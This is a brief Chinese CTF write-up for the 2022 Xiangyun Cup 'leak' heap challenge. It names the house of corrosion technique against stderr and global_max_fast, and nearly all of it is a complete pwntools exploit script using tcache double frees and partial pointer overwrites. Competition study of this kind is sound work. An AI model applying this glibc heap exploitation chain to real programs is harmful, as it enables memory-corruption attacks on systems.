2022祥云杯 leak

今年VNCTF的时候碰到过一种写法，方式不会，没写的出来。没想到这次祥云杯leak这题可以用那种写法写，但是我依旧比赛时没写出来。赛后记录一下。
主要是利用house of corrosion打strerr + house of kiwi触发IO，这题不用kiwi直接用exit也行。

wjh 师傅的VNCTF2022 HideOnHeap 题解：https://blog.wjhwjhn.com/archives/783/

exp:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')

s = process('./leak')

def add(index,size):
	s.sendlineafter(b'Your choice: ', b'1')
	s.sendlineafter(b'Index: ', str(index))
	s.sendlineafter(b'Size: ', str(size))

def edit(index,content):
	s.sendlineafter(b'Your choice: ', b'2')
	s.sendlineafter(b'Index: ', str(index))
	s.sendafter(b'Content: ', content)

def delete(index):
	s.sendlineafter(b'Your choice: ', b'3')
	s.sendlineafter(b'Index: ', str(index))


add(0, 0x14b0)
add(1, 0x410)
add(2, 0x30)
add(0xf, 0x14c0)
delete(0xf)
add(0xe, 0x10)

delete(1)
delete(2)
edit(2, b'a'*0x10)
delete(2)
edit(2, b'a'*0x10)
delete(2)
edit(2, b'\x60\x77')
edit(1, b'\x80\xe6')

add(3, 0x410) # 3 = 1
add(4, 0x30) # 4 = 3
add(5, 0x30) # 5 = 1
add(6, 0x30) # 6 stderr

delete(1)
delete(2)
edit(2, b'a'*0x10)
delete(2)
edit(2, b'a'*0x10)
delete(2)
edit(2, b'\x60\x77')
edit(1, b'\x40\xf9')

add(7 ,0x410) # 7 = 1
add(8, 0x30) # 8 = 3
add(9, 0x30) # 9 = 1
add(10, 0x30) # 10 global_max_fast

add(0xd, 0x14c0)

edit(10, b'\xff'*8)
delete(0)
delete(0xd)

edit(6, p64(0xFBAD1800) + p64(0)*3 + b'\x50')


edit(0xa, p64(0x80))
delete(0xd)
edit(0xf, p64(0)*3 + p64(0x233))


#gdb.attach(s, 'b _IO_new_file_xsputn')
#pause()

add(11, 0x8880)

s.interactive()